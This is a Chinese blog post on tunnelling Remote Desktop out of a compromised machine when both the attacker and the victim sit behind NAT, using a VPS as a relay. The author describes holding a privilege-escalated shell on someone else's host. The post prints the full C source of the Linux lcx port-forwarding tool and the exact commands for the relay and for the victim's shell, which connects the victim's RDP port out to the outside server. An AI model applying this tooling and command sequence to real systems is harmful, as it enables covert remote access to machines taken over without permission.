内网到内网的端口转发

零、前言

自己手里一直有一个shell,已提权成功,但是对方和我自己都是在内网,无法进行常规的3389端口转发。估计很多人都遇到过这个问题,可能一般就到此为止了。前端时间一大牛提供了一个思路,在外网架一台服务器作为中转,让服务端和控制端都主动连接服务器,实现流量转发。如果你有一个windows外网主机就没什么好说的了,这里直说用linux配置的方法,我用的是一台外网的vps。

一、工具

这里用到一个经典的工具,lcx。不过需要windows和linux下两种版本的,windows版相信应该都有,还需要一个linux版的,这里我把源码提供一下,根据自己的环境编译后用使用,因为32位和64位是不通用的。

#include <sys/time.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <netdb.h>
  
#define VERSION "2.2"
#define TIMEOUT 300
#define max(a,b) (a)>(b)?(a):(b)
#define MAXSIZE 10240
#define HOSTLEN 40
#define CONNECT_NUMBER 5
  
/* define function here */
void usage(char *s);
void transdata(int fd1,int fd2);
void closeallfd(int);
void makelog(char *buffer,int length);
int testifisvalue(char *str);
int bind2conn(int port1,char *host,int port2);
int bind2bind(int port1,int port2);
int conn2conn(char *host1,int port1,char *host2,int port2);
int create_socket();
int create_serv(int sockfd,int port);
int client_connect(int sockfd,char* server,int port);
  
/* define GLOBAL varible here */
extern int errno;
FILE *fp;
  
main(int argc,char **argv)
{
    char **p;
    char host1[HOSTLEN],host2[HOSTLEN];
    int port1=0,port2=0,method=0;
    int length;
    char *logfile=NULL;
  
    p=argv;
    memset(host1,0,HOSTLEN);
    memset(host2,0,HOSTLEN);
    while(*p)
    {
        if(strcmp(*p,"-v")==0)
        {
            printf("Socket data transport tool.\r\nVersion:%s\r\n",VERSION);
            p++;
            continue;
        }
        if(strcmp(*p,"-h1")==0)
        {
            if(testifisvalue(*(p+1))==1)
            {
                length=(strlen(*(p+1))>HOSTLEN-1)?HOSTLEN-1:strlen(*(p+1));
                strncpy(host1,*(++p),length);
            }
            p++;
            continue;
        }
        if(strcmp(*p,"-h2")==0)
        {
            if(testifisvalue(*(p+1))==1)
            {
                length=(strlen(*(p+1))>HOSTLEN-1)?HOSTLEN-1:strlen(*(p+1));
                strncpy(host2,*(++p),length);
            }
            p++;
            continue;
        }
        if(strcmp(*p,"-p1")==0)
        {
            if(testifisvalue(*(p+1))==1)
                port1=atoi(*(++p));
            p++;
            continue;
        }
        if(strcmp(*p,"-p2")==0)
        {
            if(testifisvalue(*(p+1))==1)
                port2=atoi(*(++p));
            p++;
            continue;
        }
        if(strcmp(*p,"-m")==0)
        {
            if(testifisvalue(*(p+1))==1)
                method=atoi(*(++p));
            p++;
            continue;
        }
        if(strcmp(*p,"-log")==0)
        {
            if(testifisvalue(*(p+1))==1)
                logfile=*(++p);
            else
            {
                printf("[ERROR]:must supply logfile name\r\n");
                exit(0);
            }
            p++;
            continue;
        }
        p++;
    }
    signal(SIGCLD,SIG_IGN);
    signal(SIGINT,&closeallfd);
    if(logfile !=NULL)
    {
        fp=fopen(logfile,"a");
        if(fp == NULL )
        {
            perror("open logfile");
            exit(0);
        }
    }
    makelog("######################## start ################\r\n",49);
    switch(method)
    {
    case 0:
        usage(argv[0]);
        break;
    case 1:
        if((port1==0) || (port2==0))
        {
            printf("[ERROR]:must supply PORT1 and PORT2.\r\n");
            break;
        }
        if(strlen(host2)==0)
        {
            printf("[ERROR]:must supply HOST2.\r\n");
            break;
        }
        bind2conn(port1,host2,port2);
        break;
    case 2:
        if((port1==0) || (port2==0))
        {
            printf("[ERROR]:must supply PORT1 and PORT2.\r\n");
            break;
        }
        bind2bind(port1,port2);
        break;
    case 3:
        if((port1==0) || (port2==0))
        {
            printf("[ERROR]:must supply PORT1 and PORT2.\r\n");
            break;
        }
        if(strlen(host1)==0)
        {
            printf("[ERROR]:must supply HOST1.\r\n");
            break;
        }
        if(strlen(host2)==0)
        {
            printf("[ERROR]:must supply HOST2.\r\n");
            break;
        }
        conn2conn(host1,port1,host2,port2);
        break;
    default:
        usage(argv[0]);
    }
    closeallfd(0);
}
  
int testifisvalue(char *str)
{
    if(str == NULL ) return(0);
    if(str[0]=='-') return(0);
    return(1);
}
  
void usage(char *s)
{
    printf("Socket data transport tool\r\n");
    printf("by bkbll(bkbll@cnhonker.net)\r\n\r\n");
    printf("Usage:%s -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]\r\n",s);
    printf(" -v: version\r\n");
    printf(" -h1: host1\r\n");
    printf(" -h2: host2\r\n");
    printf(" -p1: port1\r\n");
    printf(" -p2: port2\r\n");
    printf(" -log: log the data\r\n");
    printf(" -m: the action method for this tool\r\n");
    printf(" 1: listen on PORT1 and connect to HOST2:PORT2\r\n");
    printf(" 2: listen on PORT1 and PORT2\r\n");
    printf(" 3: connect to HOST1:PORT1 and HOST2:PORT2\r\n");
  
    closeallfd(0);
}
  
int bind2conn(int port1,char *host,int port2)
{
    int sockfd,sockfd1,sockfd2;
    struct sockaddr_in remote;
    int size;
    int pid;
    char buffer[1024];
  
    memset(buffer,0,1024);
    if((sockfd=create_socket())==0) exit(0);
    if(create_serv(sockfd,port1)==0)
    {
        close(sockfd1);
        exit(0);
    }
    size=sizeof(struct sockaddr);
    while(1)
    {
        printf("waiting for response.........\n");
        if((sockfd1=accept(sockfd,(struct sockaddr *)&remote,(socklen_t *)&size))<0)
        {
            perror("accept error\n");
            continue;
        }
        printf("accept a client from %s:%d\n",inet_ntoa(remote.sin_addr),ntohs(remote.sin_port));
        if((sockfd2=create_socket())==0)
        {
            close(sockfd1);
            continue;
        }
        printf("make a connection to %s:%d....",host,port2);
        fflush(stdout);
        if(client_connect(sockfd2,host,port2)==0)
        {
            close(sockfd2);
            sprintf(buffer,"[SERVER]connection to %s:%d error\r\n",host,port2);
            write(sockfd1,buffer,strlen(buffer));
            memset(buffer,0,1024);
            close(sockfd1);
            continue;
        }
        printf("ok\r\n");
        pid=fork();
        if(pid==0) transdata(sockfd1,sockfd2);
        // sleep(2);
        close(sockfd1);
        close(sockfd2);
    }
  
}
  
int bind2bind(int port1,int port2)
{
    int fd1,fd2,sockfd1,sockfd2;
    struct sockaddr_in client1,client2;
    int size1,size2;
    int pid;
  
    if((fd1=create_socket())==0) exit(0);
    if((fd2=create_socket())==0) exit(0);
    printf("binding port %d......",port1);
    fflush(stdout);
    if(create_serv(fd1,port1)==0)
    {
        close(fd1);
        exit(0);
    }
    printf("ok\r\n");
    printf("binding port %d......",port2);
    fflush(stdout);
    if(create_serv(fd2,port2)==0)
    {
        close(fd2);
        exit(0);
    }
    printf("ok\r\n");
    size1=size2=sizeof(struct sockaddr);
    while(1)
    {
        printf("waiting for response on port %d.........\n",port1);
        if((sockfd1=accept(fd1,(struct sockaddr *)&client1,(socklen_t *)&size1))<0)
        {
            perror("accept1 error");
            continue;
        }
        printf("accept a client on port %d from %s,waiting another on port %d....\n",port1,inet_ntoa(client1.sin_addr),port2);
        if((sockfd2=accept(fd2,(struct sockaddr *)&client2,(socklen_t *)&size2))<0)
        {
            perror("accept2 error");
            close(sockfd1);
            continue;
        }
        printf("accept a client on port %d from %s\n",port2,inet_ntoa(client2.sin_addr));
        pid=fork();
        if(pid==0) transdata(sockfd1,sockfd2);
        //sleep(2);
        close(sockfd1);
        close(sockfd2);
    }
}
  
int conn2conn(char *host1,int port1,char *host2,int port2)
{
    int sockfd1,sockfd2;
    int pid;
    fd_set fds;
    int l;
    int result;
    char buffer[MAXSIZE];
  
    while(1)
    {
        if((sockfd1=create_socket())==0) exit(0);
        if((sockfd2=create_socket())==0) exit(0);
        printf("[+] make a connection to %s:%d....\r\n",host1,port1);
        fflush(stdout);
        if(client_connect(sockfd1,host1,port1)==0)
        {
            printf("[-] connect to host1 failed\r\n");
            close(sockfd1);
            close(sockfd2);
            continue;
        }
        printf("[+] host1 connected\r\n");
        l=0;
        memset(buffer,0,MAXSIZE);
        //fixed by Twi1ight 2012.09.12
        while(1)
        {
            FD_ZERO(&fds);
            FD_SET(sockfd1, &fds);
            if (select(sockfd1+1, &fds, NULL, NULL, NULL) < 0 ) 
            {
                if (errno == EINTR) continue;
                break;
            }
  
            if (FD_ISSET(sockfd1, &fds)) 
            {
                l=read(sockfd1, buffer, MAXSIZE);
                break;
            }
            sleep(5);
        }
        if(l<=0) 
        { 
            printf("[-] there is a error...Create a new connection.\r\n");
            continue;
        }
        while(1)
        {
            printf("[+] make a connection to %s:%d....\r\n",host2,port2);
            fflush(stdout);
            if(client_connect(sockfd2,host2,port2)==0)
            {
                printf("[-] connect to host2 failed\r\n");
                close(sockfd1);
                close(sockfd2);
                continue;
            }
            if(write(sockfd2,buffer,l) < 0)
            { 
                printf("[-] send failed.\r\n");
                continue;
            }
            l=0;
            memset(buffer,0,MAXSIZE);
            break;
        }
        printf("[+] all hosts connected!\r\n");
        pid=fork();
        if(pid==0) transdata(sockfd1,sockfd2);
        //sleep(2);
        close(sockfd1);
        close(sockfd2);
    }
}
  
void transdata(int fd1,int fd2)
{
    struct timeval timeset;
    fd_set readfd,writefd;
    int result,i=0;
    char read_in1[MAXSIZE],send_out1[MAXSIZE];
    char read_in2[MAXSIZE],send_out2[MAXSIZE];
    int read1=0,totalread1=0,send1=0;
    int read2=0,totalread2=0,send2=0;
    int sendcount1,sendcount2;
    int maxfd;
    struct sockaddr_in client1,client2;
    int structsize1,structsize2;
    char host1[20],host2[20];
    int port1=0,port2=0;
    char tmpbuf1[100],tmpbuf2[100];
  
    memset(host1,0,20);
    memset(host2,0,20);
    memset(tmpbuf1,0,100);
    memset(tmpbuf2,0,100);
    if(fp!=NULL)
    {
        structsize1=sizeof(struct sockaddr);
        structsize2=sizeof(struct sockaddr);
        if(getpeername(fd1,(struct sockaddr *)&client1,(socklen_t *)&structsize1)<0)
        {
            strcpy(host1,"fd1");
        }
        else
        {
            printf("got,ip:%s,port:%d\r\n",inet_ntoa(client1.sin_addr),ntohs(client1.sin_port));
            strcpy(host1,inet_ntoa(client1.sin_addr));
            port1=ntohs(client1.sin_port);
        }
        if(getpeername(fd2,(struct sockaddr *)&client2,(socklen_t *)&structsize2)<0)
        {
            strcpy(host2,"fd2");
        }
        else
        {
            printf("got,ip:%s,port:%d\r\n",inet_ntoa(client2.sin_addr),ntohs(client2.sin_port));
            strcpy(host2,inet_ntoa(client2.sin_addr));
            port2=ntohs(client2.sin_port);
        }
        sprintf(tmpbuf1,"\r\n########### read from %s:%d ####################\r\n",host1,port1);
        sprintf(tmpbuf2,"\r\n########### reply from %s:%d ####################\r\n",host2,port2);
    }
  
    maxfd=max(fd1,fd2)+1;
    memset(read_in1,0,MAXSIZE);
    memset(read_in2,0,MAXSIZE);
    memset(send_out1,0,MAXSIZE);
    memset(send_out2,0,MAXSIZE);
  
    timeset.tv_sec=TIMEOUT;
    timeset.tv_usec=0;
    while(1)
    {
        FD_ZERO(&readfd);
        FD_ZERO(&writefd);
  
        FD_SET(fd1,&readfd);
        FD_SET(fd1,&writefd);
        FD_SET(fd2,&writefd);
        FD_SET(fd2,&readfd);
  
        result=select(maxfd,&readfd,&writefd,NULL,&timeset);
        if((result<0) && (errno!=EINTR))
        {
            perror("select error");
            break;
        }
        else if(result==0)
        {
            printf("time out\n");
            break;
        }
        if(FD_ISSET(fd1,&readfd))
        {
            /* 不能超过MAXSIZE-totalread1,不然send_out1会溢出 */
            if(totalread1<MAXSIZE)
            {
                read1=read(fd1,read_in1,MAXSIZE-totalread1);
                if(read1==0) break;
                if((read1<0) && (errno!=EINTR))
                {
                    perror("read data error");
                    break;
                }
                memcpy(send_out1+totalread1,read_in1,read1);
                makelog(tmpbuf1,strlen(tmpbuf1));
                makelog(read_in1,read1);
                totalread1+=read1;
                memset(read_in1,0,MAXSIZE);
            }
        }
        if(FD_ISSET(fd2,&writefd))
        {
            int err=0;
            sendcount1=0;
            while(totalread1>0)
            {
                send1=write(fd2,send_out1+sendcount1,totalread1);
                if(send1==0)break;
                if((send1<0) && (errno!=EINTR))
                {
                    perror("unknow error");
                    err=1;
                    break;
                }
                if((send1<0) && (errno==ENOSPC)) break;
                sendcount1+=send1;
                totalread1-=send1;
            }
            if(err==1) break;
            if((totalread1>0) && (sendcount1>0))
            {
                /* 移动未发送完的数据到开始 */
                memcpy(send_out1,send_out1+sendcount1,totalread1);
                memset(send_out1+totalread1,0,MAXSIZE-totalread1);
            }
            else
                memset(send_out1,0,MAXSIZE);
        }
        if(FD_ISSET(fd2,&readfd))
        {
  
            if(totalread2<MAXSIZE)
            {
                read2=read(fd2,read_in2,MAXSIZE-totalread2);
                if(read2==0)break;
                if((read2<0) && (errno!=EINTR))
                {
                    perror("read data error");
                    break;
                }
                memcpy(send_out2+totalread2,read_in2,read2);
                makelog(tmpbuf2,strlen(tmpbuf2));
                makelog(read_in2,read2);
                totalread2+=read2;
                memset(read_in2,0,MAXSIZE);
            }
        }
        if(FD_ISSET(fd1,&writefd))
        {
            int err2=0;
            sendcount2=0;
            while(totalread2>0)
            {
                send2=write(fd1,send_out2+sendcount2,totalread2);
                if(send2==0)break;
                if((send2<0) && (errno!=EINTR))
                {
                    perror("unknow error");
                    err2=1;
                    break;
                }
                if((send2<0) && (errno==ENOSPC)) break;
                sendcount2+=send2;
                totalread2-=send2;
            }
            if(err2==1) break;
            if((totalread2>0) && (sendcount2 > 0))
            {
                /* 移动未发送完的数据到开始 */
                memcpy(send_out2,send_out2+sendcount2,totalread2);
                memset(send_out2+totalread2,0,MAXSIZE-totalread2);
            }
            else
                memset(send_out2,0,MAXSIZE);
        }
    }
  
    close(fd1);
    close(fd2);
    printf("ok,I closed the two fd\r\n");
    //exit(0);
}
  
void closeallfd(int n)
{
    int i;
    printf("Let me exit...");
    fflush(stdout);
    for(i=3;i<256;i++)
    {
        close(i);
    }
    if(fp != NULL)
    {
        fprintf(fp,"exited\r\n");
        fclose(fp);
    }
    printf("all overd\r\n");
    exit(0);
}
void makelog(char *buffer,int length)
{
    if(fp !=NULL)
    {
        //fprintf(fp,"%s",buffer);
        write(fileno(fp),buffer,length);
        fflush(fp);
    }
}
  
int create_socket()
{
    int sockfd;
  
    sockfd=socket(AF_INET,SOCK_STREAM,0);
    if(sockfd<0)
    {
        perror("create socket error");
        return(0);
    }
    return(sockfd);
}
  
int create_serv(int sockfd,int port)
{
    struct sockaddr_in srvaddr;
    int on=1;
  
    bzero(&srvaddr,sizeof(struct sockaddr));
    srvaddr.sin_port=htons(port);
    srvaddr.sin_family=AF_INET;
    srvaddr.sin_addr.s_addr=htonl(INADDR_ANY);
  
    setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on)); //so I can rebind the port
    if(bind(sockfd,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr))<0)
    {
        perror("error");
        return(0);
    }
    if(listen(sockfd,CONNECT_NUMBER)<0)
    {
        perror("listen error\n");
        return(0);
    }
    return(1);
}
  
int client_connect(int sockfd,char* server,int port)
{
    struct sockaddr_in cliaddr;
    struct hostent *host;
  
    if(!(host=gethostbyname(server)))
    {
        printf("gethostbyname(%s) error:%s\n",server,strerror(errno));
        return(0);
    }
  
    bzero(&cliaddr,sizeof(struct sockaddr));
    cliaddr.sin_family=AF_INET;
    cliaddr.sin_port=htons(port);
    cliaddr.sin_addr=*((struct in_addr *)host->h_addr);
  
    if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)
    {
        perror("[-] error");
        return(0);
    }
    return(1);
}

二、命令

这里的连接需要三个步骤,步骤的顺序不能出错。

  1. linux主机执行端口转发命令,将3379的端口流量转发到3389端口(端口自定义)

  2. ./lcx -m 2 -p1 3379 -p2 3389

  3. 服务端shell执行端口转发命令,将3389端口转发到远程linux主机的3379端口

    ‍lcx -slave linux_ip 3379 127.0.0.1 3389

  4. 在客户端(本机)连接3389,ip是linux主机的ip

一图胜千言:

三、问题

这里linux主机执行端口转发后应该能在外网扫描到打开的端口,否则是连接不上的。如果连不上先执行端口查看命令,看一下端口是否打开,如果打开了外网却扫不到,可能是防火墙的原因。修改一下配置,添加了自定义的端口添加到防火墙中,然后重启防火墙即可。

另一个问题就是连接不稳定,容易断开,可能网速有很大关系,如果一直在远程桌面窗口操作会稳定些,否则可能一个最小化连接就断了。另外如果shell端执行完一段时间后lcx提示failed,不用理会,命令没错的话连接应该已经建立了,shell端和客户端分别连接的时候linux端会分别会出现反应。

内网到内网的端口转发》上有 1 条评论

  1. Pingback引用通告: 家用路由器的端口映射 | Xman's Blog

发表评论

电子邮件地址不会被公开。 必填项已用*标注